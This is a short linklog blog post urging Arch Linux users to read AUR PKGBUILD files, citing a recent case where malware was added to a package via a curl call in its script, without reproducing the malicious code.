Always read your PKGBUILDs

If you don’t read the PKGBUILD file whenever you download something from the AUR repositories, you are exposing yourself to terrible security issues, as the world has recently seen.

Malware was spotted in the AUR repositories of Arch Linux last week. Someone modified the PKGBUILD of a package to add a curl call in the script file, as can be seen here (as long as they don’t purge the blob object from the repository, because they stripped out the commit from the history).

I would file this tip in the same category as “don’t just curl bash pipe stuff you find at GitHub”, but it’s getting late and I don’t have time for entering in the rabbit hole argument of where do we put the limit on trusting the software and the installers we put in our machines.

Footnote disclaimer: This is the internal permalink for an item shared in my linklog. The actual resource can be viewed by clicking on the link at the post title. The linklog is curated with links I find online or in my sources that I want to collect as a reference for later or to share with people who may find them interesting. The intention is solely informative and I cannot guarantee the exactness of the linked content.